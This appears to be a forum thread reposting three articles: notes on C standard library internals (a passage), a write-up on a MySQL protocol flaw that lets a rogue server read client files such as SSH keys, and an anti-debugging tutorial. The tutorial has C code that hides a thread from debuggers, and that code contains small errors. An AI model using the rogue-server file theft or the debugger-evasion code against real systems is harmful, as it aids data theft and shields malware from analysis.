sort, rand) integer functions number parsing multibyte conversions storage allocation environmental interactions (stdlib.h) random numbers Let’s start with an interesting topic: random numbers. The standard library provides a rand() function to generate a pseudorandom sequence starting from a seed specified by srand(). The numbers range from 0 to RAND_MAX. The first problem is that RAND_MAX can be very small (~ 65535) on some platforms. Second problem is that the quality of rand() is not generally very good on most platforms. On Mac OS it is horrible. Changing the random seed by only a small amount (such as seeding by the epoch), leads to similar initial random values. seed 1st rand 1500000000 1189467867 1500000001 1189484674 1500000002 1189501481 1500000003 1189518288 1500000004 1189535095 1500000005 1189551902 1500000006 1189568709 1500000007 1189585516 1500000008 1189602323 1500000009 1189619130 Rather than rely on whatever implementation of rand you get on a given architecture, it’s just as easy to define your own xorshift rand function. The one below is due to Chris Wellons who arrived at the constants through an exhaustive search. static unsigned long g_rand_state = 0; /* assumes 64-bit longs */ unsigned long defensive_rand() { g_rand_state ^= g_rand_state >> 30; g_rand_state *= 0xbf58476d1ce4e5b9UL; g_rand_state ^= g_rand_state >> 27; g_rand_state *= 0x94d049bb133111ebUL; g_rand_state ^= g_rand_state >> 31; return g_rand_state; } One problem is that these 64-bit constants limit portability. You can portably assume that longs are 32-bits. (C99 gives us long long for that.) Chris provides 32-bit rand functions to choose from as well. Luckily the compiler should fail with an error like “integer literal is too large to be represented in any integer type” rather than accepting the program and creating bugs. Now we have a good rand() function, but how should we seed g_rand_state with an initial value? The typical way is to gather the epoch from time(NULL), but it will mean the application will use the same seed if run more than once per second. There are two other sources of entropy available from the standard library. One is hashing the path generated by tmpnam(), which in many implementations consults the process ID or a higher precision clock. The second is hashing the address of the main function, which is often fairly unpredictable due to address space layout randomization (ASLR). Using the address of main numerically is a little tricky. C99 has a type called intptr_t which can hold pointer values as an integer, but this type is for data pointers only, not function pointers which on some architectures have a different size. We might consider casting a pointer to main as (char *) and reading the bytes, but for the same size reason this isn’t feasible. What we can do is create a function pointer to main, point another pointer at it and read the value out byte by byte. A pointer-to-function-pointer is just a data pointer and can be cast to (void *). int (*p)(int, char**) = &main; unsigned char bytes[sizeof(p) + 1] = { 0 }; memcpy(bytes, (void*)&p, sizeof(p)); The bytes array is a NUL terminated string and can be hashed. To see these techniques in action and how to combine the entropy, check out rand.c. If you’re willing to use functions beyond the C standard library, POSIX provides a random() function that is higher quality, and OpenBSD provides arc4random() which returns crypto-grade randomness. (stdlib.h) integer functions In C89 the rounding of integer division isn’t fully specified. When one of the numerator or denominator are negative it may either round toward zero or downward. It matches whatever the underlying hardware does. The committee didn’t want to introduce overhead on any system going against the hardware convention. In C99 they changed their mind, reasoning that Fortan (known for numerical programming) defines the rounding. C99 rounds toward zero. To match this behavior in C89, use the div and ldiv functions. They return structures div_t and ldiv_t that contain both the quotient and remainder of the division. The only reason to use these functions in C99 is for efficiency, because the functions may be implemented with a compiler builtin that can compute the quotient and remainder together in a single assembly instruction. A note about the ato{i,l,f} functions – their behavior is undefined if the input cannot be parsed correctly. These functions need not set errno even. Except for behavior on error, atoi is equivalent to (int)strtol(nptr, (char **)NULL, 10). The strto{d,l,ul} functions should always be preferred, because they provide proper error reporting and choice of base. The implementation of strtod in Plauger’s book was very careful about floating point overflow. It processed digits in groups of eight and then combined them later into a final result. It also consulted the decimal_point attribute set by the LC_MONETARY part of the current locale. (stdlib.h.) memory An interesting bit of history: malloc used to be considered a low-level UNIX function, while calloc (“C alloc”) was conceived as the portable C version. However the committee standardized malloc too because it has less overhead (doesn’t zero the memory). Nowadays it seems malloc is more popular. There also used to be a cfree, but it was identical to free and didn’t make the cut for ANSI C. The most flexible allocation function is realloc because it can simulate both malloc and free. When passed NULL for the original pointer it behaves like malloc, and when passed 0 for requested size it acts like free. (stdlib.h) termination and execution Stdlib contains the EXIT_FAILURE and EXIT_SUCCESS macros with implementation defined integer values to indicate success or failure on exit. These values would be returned by main or passed to exit(). The C standard actually treats return 0 in main or exit(0) specially, and maps it to whatever the system specific success code is. (Similar to how 0 in a pointer context is treated specially as the NULL value the way we talked about earlier.) Thus you don’t need to include stdlib.h just to return successfully. EXIT_FAILURE is necessary for portably indicating failure, though. The raw value 1 is considered successful on some platforms. Speaking of exit(), it causes “normal” termination. It closes all open file handles, deletes files created by tmpfile(), and calls any handlers registered by atexit() in reverse order of their registration. The abort() function, on the other hand, causes immediate and “abnormal” termination. It needn’t flush buffers, remove temp files, or close open streams. It can be canceled by catching SIGABRT. Aborting can be useful because it will cause a core dump if the OS is configured to save one. Thus the assert() function calls abort() to produce a core file to debug assertion failure. Stdlib.h provides the system() function to run a command in the shell. If the command is a NULL pointer, system() will return non-zero if the command interpreter is available, and zero if it is not. The CERT standard says system() is a security violation and flat out says not to call it. It’s easy to make a mistake with system(). Commands that are not fully pathed can be overridden, and even relative paths can be tricky if the attacker can control the current directory. And of course unsanitized input can attack through the shell. CERT suggests using execve() in POSIX to call fully pathed executables. (stdlib.h) wchar_t OK, this is going to get complicated. The takeaway is that the C standard library cannot portably handle Unicode. You’ll need a good third-party library. Let’s see why this is. Before locales and all that, C was designed for 7-bit ASCII text. The committee endorsed the use of locales to specify a codepage that reassigned the meaning of extra characters using all eight bits (the minimum allowed size of char). However some languages use more than 255 symbols (+ NUL). There were two ways to handle bigger alphabets: use bigger chunks of memory to hold each character code, or define special sequences of single byte characters to stand for extended characters. These approaches are called “wide characters” and “multibyte characters.” Generally because networking equipment and disk storage is byte oriented, programs use multi-byte character encoding for communication with the outside world and storage. However for in-memory use people felt that using wide characters would be cleaner, because each cell in an array would map to exactly one character, like in the old ASCII string days. The C89 standard is not very helpful with multibyte or wide character encoding. It merely set the stage with a wchar_t type for wide characters, and functions in stdlib.h to convert multibyte to wchar_t (mbstowcs) and the reverse (wcstombs) based on the locale. The committee was waiting to see how people wanted to work with international characters before standardizing it. K&R 2nd edition does not list these functions but Plauger and the C89 spec have them. The whole idea was that locale-specific multibyte to wide character conversion was supposed to be more general than any particular encoding system. However, nowadays Unicode has proven to be more popular than other encodings. The multibyte UTF-8 encoding is the standard interchange on the web, and the UCS-4 character set is up to the task of handling all the world’s languages and then some. Should be no problem, right? Well, at the time C99 was being standardized, the Unicode consortium (actually the contemporaneous European ISO committee) was endorsing the more limited Universal Coded Character Set UCS-2. The codepoints for UCS-2 are 16 bits, so that’s the minimum width that C99 requires for wchar_t. Sadly the committee made their decision shortly before four byte UCS-4 was proposed (ISO 10646). Vendors like Microsoft jumped into Unicode right away and implemented wchar_t as 16 bits. It’s deep in their APIs and they’re now stuck with that size for backward compatibility. Even Mac OS and iOS use 16 bit wchar_t for whatever reason. UTF-16 combines the worst of multibyte characters and wide characters. a) Characters outside the “base multilingual plane” require two UTF-16 codepoints (called a surrogate pair) to represent them. This breaks the one-character-one-codepoint assumption. b) It’s wasteful of memory because even ASCII characters take two bytes. C99 provides wide character versions of the ctype functions, in <wctype.h>, but they simply cannot work properly with surrogate pairs. For example (as pointed out here😞 0xD800 0xDF1E = U+1031E is a letter (iswalpha should be true) 0xD800 0xDF20 = U+10320 is not a letter (iswalpha should be false) 0xD834 0xDF1E = U+1D31E is not a letter (iswalpha should be false) 0xD834 0xDF20 = U+1D320 is not a letter (iswalpha should be false) 0xD835 0xDF1E = U+1D71E is a letter (iswalpha should be true) 0xD835 0xDF20 = U+1D720 is a letter (iswalpha should be true) Neither the first nor the second element of the pair alone can predict whether the resulting Unicode character is alphabetic. There is no way that a system can provide this information through a function ‘iswalpha’ that takes a single wchar_t argument. C99 does guarantee a macro will be present when the current environment is ISO 10646 compliant, meaning wchar_t can hold every UCS-4 codepoint. We can blow up for the other platforms: #ifndef __STDC_ISO_10646__ #error "Your wide characters suck." #endif Even assuming we restrict the code to ISO 10646 systems only, the wctype functions are too crude to deal with the subtleties of international languages. Because of how Unicode characters can join together, it’s infeasible to use pointer arithmetic to calculate “string length” or parse “words” with iswspace() robustly. Some parts of programs can continue to operate on text as an opaque series of bytes. However for other parts that must inspect the characters themselves, you should use a sophisticated Unicode library like ICU or utf8proc. This has the advantage of working with C89, so you won’t be forced to upgrade to C99 just because of text processing. With a good Unicode library we don’t need wide characters. We can use UTF-8 everywhere, even in program memory. That’s the school of thought behind utf8everywhere.org. (stdlib.h) lessons from the code While reading Plauger’s implementation for stdlib, I noticed some tricks worth sharing. The comma operator can be used to group multiple small assignments together under an if statement without needing to add curly braces. if (condition) foo = 1, bar = 2; Also an if statement with no statements can be used to shrink a big expression in another if statement: if (cond) ; else if (big cond) foo; C89 allows bare blocks inside a function to segregate variable declarations near the code that uses them. The variables are not accessible outside the block. It can help readability to know when variables are no longer needed, although you might argue that it suggests the function as a whole is too big. #include <stdio.h> int main(void) { puts("Hello."); { int i = 0; printf("%d\n", i); } /* error: use of undeclared identifier 'i' */ printf("%d\n", i); } Speaking of brackets, Plauger uses Whitesmiths style indentation, with brackets indented to the level of their code: if (cond) { foo(); while (cond) { bar(); baz(); } } I find it difficult to read (probably just unfamiliar), but it does have an internal consistency. The brackets are wrapping up multiple statements into a single unit, and this unit is indented the same way that a single statement would be. Still not going to indent this way, but just saying. Another interesting trick is negating an unsigned number. Plauger does that to consolidate code for signed and unsigned numbers in the same function. unsigned long _Stoul(const char *, char **, int); #define atoi(s) (int)_Stoul(s, NULL, 10); #define atol(s) (long)_Stoul(s, NULL, 10); #define strtoul(s, endptr, base) _Stoul(s, endptr, base); This _Stoul() function negates its unsigned long value if the string it is parsing has a negative sign. This operates bitwise on an unsigned value the same as it would on signed, and after casting for atoi and atol it will be negative as expected. I didn’t know it was “allowed,” but C doesn’t care. string.h This header is divided between functions starting with str- and those starting with mem-. The former work with NUL terminated strings, and the latter operate with explicit lengths. Some of the str- functions have a modifier to limit length (strncat, strncmp, strncpy) or a modifier to work backward (strrchr). However the header doesn’t have all permutations. For instance no strnlen or memrchr. Why does strchr take an int rather than a char for its search character? Same with memset, it takes an int value, but converts it to unsigned char internally. The spec dictates this in section That misleading int signature is for backward compatibility with pre-ANSI code which lacked function prototypes and promoted char arguments to int. Under default argument promotions any integral type smaller than int (or unsigned int) always converts to int. All standard library functions are specified in terms of the “widened” types. It’s just that string.h contains many functions where it is especially apparent. The widened types ensure that most library functions can be called with or without a prototype in scope. Legacy code doesn’t use prototypes, and ANSI C did not want to break backward compatibility. Even if people were willing to update all the legacy code, any legacy modules distributed as compiled object files rather than source would not link properly against functions with changed argument types. Similar rationale lies behind the standard’s guarantee that char pointers and void pointers share the same representation and alignment requirements. Relying on this guarantee allows old code that to work with the void* malloc in place of the original char* malloc. (See the C99 Rationale section 7.1.4, Use of Library Functions.) We’re not done with the type mysteries in string.h. Why is it that strchr casts its int argument to char internally and memchr casts to unsigned int? Well given that strchr is searching through char*, it makes sense to match the type. But memchr is searching through void*. Why not compare each memory location with char rather than unsigned char? It turns out that the C standard makes special guarantees about unsigned char that make it an ideal type to represent arbitrary binary information. Unsigned char is guaranteed to have no padding bits. All bits contribute to the value of the data. Other types on some architectures include things like parity bits which don’t affect the value itself but do use space. No bitwise operation starting from an unsigned char value, when converted back into that type, can produce overflow, trap representations or undefined behavior. It can be freely manipulated. Trap representations are certain bit patterns that are reserved for exceptional circumstances, like the NaN value in floating point numbers. Accessing parts of a larger data object ith an unsigned char pointer will not violate any “aliasing rules.” The unsigned char pointer will be guaranteed to see all modifications of the data object. In “Portable C,” Rabinowitz says the char type has a few distinct uses: codeset characters, units of storage, small numbers, and small bit patterns. He recommends regular char for codepoints and small numbers, and unsigned for the others. (In C99 wchar_t might be considered the proper way to represent codeset characters, but we’ve already seen the difficulty there.) Note that Rabinowitz doesn’t specify signed char and unsigned char, but rather plain char and unsigned char. That’s because C does not specify whether plain char is signed or unsigned. We would get a warning trying to pass a definitively signed char* to a function in string.h if the default was unsigned char for that platform. The next functions that taught me something are memcpy and memmove. The first one blasts bytes from one part of memory to another, possibly taking advantage of machine instructions to do large block copies. It doesn’t check for an overlap between the source and destination, in which situation the results are undefined. C99 marks the source and destination pointers with the restrict qualifier to allow the compiler to optimize under that assumption. Memmove is the slower more careful brother. It works correctly even if the source and destination areas overlap. It is specified to act as if the source memory is first copied to a separate buffer, then copied into the destination. When I tried writing it that is exactly what I did, but Plauger has a faster way: void *(memmove)(void *d, const void *s, size_t n) { unsigned char *ds = d; const unsigned char *ss = s; if (s > d) while (n-- > 0) *ds++ = *ss++; else for (ss += n, ds += n; 0 < n; --n) *ds-- = *ss--; return d; } This compares the pointer positions to see which occurs before the other in memory, then does the copy from left to right or right to left depending on which comes before the other. This is very fast and uses no extra space. However, isn’t comparing random pointers undefined behavior? C allows you to compare pointers within the same primary data object (like the addresses of different cells in the same array), but not any random pointers. Objects could be in different segments of a segmented memory architecture, or even in totally different memory banks such as in a Harvard architecture. But with memmove why would you call it when copying one data object into a totally different one? There would be no danger that they overlap, unless you are copying too many bytes, which is already its own big problem. Thus we can assume that the pointers to memmove are in the same data object and thus comparable. What this also tells me is not to indiscriminately use memmove all the time in order to be “safe” or something, because some implementations like Plauger’s would then cause undefined behavior. One other thing to note about the memmove implementation is that it uses unsigned char pointers to do the work rather than void pointers. Doing pointer arithmetic on void* is a GNU-ism not permitted in portable C. One nice property of returning the destination address from the string.h functions is that they can chain together: if (strcmp(strncat(strcpy(s, "abcde"), "fg", 1), "abcdef")) ...; Those are the notes I wanted to share for this header. Also C99 introduces wide character versions of these functions in wchar.h. time.h First, the C standard is very lenient about this header. It has functions to do all kinds of conversions, but the bigger picture is that implementations are allowed to make their “best approximation” to the date and time. Some of them might do a bad job and yet still conform to the standard. Many C environments do not support the concepts of daylight savings or time zones. Both notions are defined geographically and politically, and thus may require more knowledge about the real world than an implementation can support. There are a lot of details in this header that I don’t want to regurgitate, but it is useful to see how the functions convert between the data types. I made a graph to make it clearer. One thing I didn’t know was that the header provides a clock() function to measure the CPU time elapsed since program start. Also that it provides a resolution of CLOCKS_PER_SEC which is often higher than one. The rest of the library is limited to nothing smaller than seconds of precision. Sursa: https://begriffs.com/posts/2019-01-19-inside-c-standard-lib.html
  14. MySQL client allows MySQL server to request any local file Sunday January 20, 2019 in Security, Magecart This week I discovered that large ecommerce and government sites got hacked via the Adminer database tool. As it turns out, the root cause is a protocol flaw in MySQL. Curiously, it is described in the official documentation, that says: The transfer of the file from the client host to the server host is initiated by the MySQL server. In theory, a patched server could be built that would tell the client program to transfer a file of the server’s choosing rather than the file named by the client in the LOAD DATA statement. Such a server could access any file on the client host to which the client user has read access. (A patched server could in fact reply with a file-transfer request to any statement, not just LOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.) “In theory”? An Evil Mysql Server which does exactly that can be found on Github, and was likely used to exfiltrate passwords from these hacked sites. And could be used to steal SSH keys and crypto wallets, as interfail points out. The server has to know the full path of the file on the client for it to succeed. However, by first requesting /proc/self/environ, the server can learn a great deal about the folder structure on the client. Several clients and libraries have built-in protection for this “feature”, or disable it by default (eg Golang, Python, PHP-PDO). But not all, as the Adminer case demonstrates. And Adminer probably won’t be the last. Discuss this topic on Twitter and Reddit. Yours truly: digital forensics consultant, tracking payment skimmers since 2015. I am also the founder of the e-commerce malware scanner and Magereport. If you are breached and need a solid cleanup & root cause analysis, do get in touch. Sursa: https://gwillem.gitlab.io/2019/01/20/sites-hacked-via-mysql-protocal-flaw/
  15. Anti Debugging Tricks #4 – Hidden Threads timb3r - reverse engineering January 19, 2019No Comments ANTIDEBUG CRASH HIDE FROM DEBUGGER NTSETINFORMATIONTHREAD THREADS Has this ever happened to you? You’re playing around with some application and and it crashes the moment you attach a debugger? Ever wondered why or how? I do. These types of questions keep me awake at night. I first became aware of this technique while cruising around some forums on the internet. People typically asking for a bypass or a method to work around it. But I was more interested in HOW this technique works less interested in how to bypass. During my research phase I noticed that after the application crashed out it would crash out with: Unhandled exception code 80000003 But that’s an int 3 exception? How is the Debugger not catching that? What the actual hell. Searching around for information I discovered that NtSetInformationThread has a parameter called THREADINFOCLASS. Which contains this interesting snippet: ThreadHideFromDebugger = 0x11 Why Hans? You may be wondering why this is even a ‘feature’ of Windows? Wouldn’t malware abuse the hell out of this? Yes, probably. But here’s why it exists: When you attach a debugger to a remote process a new thread is created. If this was just a normal thread the debugger would be caught in an endless loop as it attempted to stop it’s own execution. So behind the scenes when the debugging thread is created Windows calls NtSetInformationThread with the ThreadHideFromDebugger flag set (1). This way the process can be debugged and a deadlock prevented. Allowing code execution to continue as normal. However, now that this thread is hidden from the debugger any breakpoints or exceptions that are triggered will cause the process to crash. Due to the fact that the debugger cannot see this thread it’s now unable to trap these events. So as it turned out some devious individual noticed this odd behaviour and thought: “this would make a really cool anti-debug feature”. Now we’re here with this method widespread enough for me to be aware of it. Das Kode So what’s it actually look like in code? I wasn’t able find any live examples so I constructed my own based on how I thought it should work: 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 #include <stdio.h> #include <windows.h> enum THREADINFOCLASS { ThreadHideFromDebugger = 0x11 }; typedef NTSTATUS (WINAPI *NtQueryInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG, PULONG); typedef NTSTATUS (WINAPI *NtSetInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG); NtQueryInformationThread_t fnNtQueryInformationThread = NULL; NtSetInformationThread_t fnNtSetInformationThread = NULL; DWORD WINAPI ThreadMain(LPVOID p) { while(1) { // This can be any trigger we're using this demo purposes if(IsDebuggerPresent()) // For MingW replace with __asm { int 3; } on MSVC asm("int3"); Sleep(500); } return 0; } int main(void) { DWORD dwThreadId = 0; HANDLE hThread = CreateThread(NULL, 0, ThreadMain, NULL, 0, &amp;dwThreadId); HMODULE hDLL = LoadLibrary("ntdll.dll"); if(!hDLL) return -1; fnNtQueryInformationThread = (NtQueryInformationThread_t)GetProcAddress(hDLL, "NtQueryInformationThread"); fnNtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hDLL, "NtSetInformationThread"); if(!fnNtQueryInformationThread || !fnNtSetInformationThread) return -1; ULONG lHideThread = 1, lRet = 0; fnNtSetInformationThread(hThread, ThreadHideFromDebugger, &amp;lHideThread, sizeof(lHideThread)); fnNtQueryInformationThread(hThread, ThreadHideFromDebugger, &amp;lHideThread, sizeof(lHideThread), &amp;lRet); printf("Thread is hidden: %s\n", val ? "Yes" : "No"); WaitForSingleObject(hThread, INFINITE); return 0; } Pretty simple yes? Now if you run the program and attempt to attach a debugger you’ll get this interesting crash: 0036:err:seh:raise_exception Unhandled exception code 80000003 flags 0 addr 0x401566 Oh ho ho! Poor Tony Throwing Hans off Nakatomi Well now we’ve established how this works we can look at beating it. There’s a number of ways including: Hooking the required Nt Function calls. Replacing the int 3 instruction with a nop. Nopping or hooking the “trigger” function. I opted for nopping out int 3: You can use your tool of choice to locate the required int 3 instruction: You’ll have to search around a bit Here’s our thread with the check Now we can nop that sucka out Attaching a debugger and resuming execution will result in everything working as expected. Bye Hans Ho-ho-ho One Time Donation: BTC 1DXcjix3FmcHYezFAjCrpzZA9FkbSC971e Paypal PayPal.me/timb3r Monthly Donation: Patreon Sursa: https://gamephreakers.com/2019/01/anti-debugging-tricks-4-hidden-threads/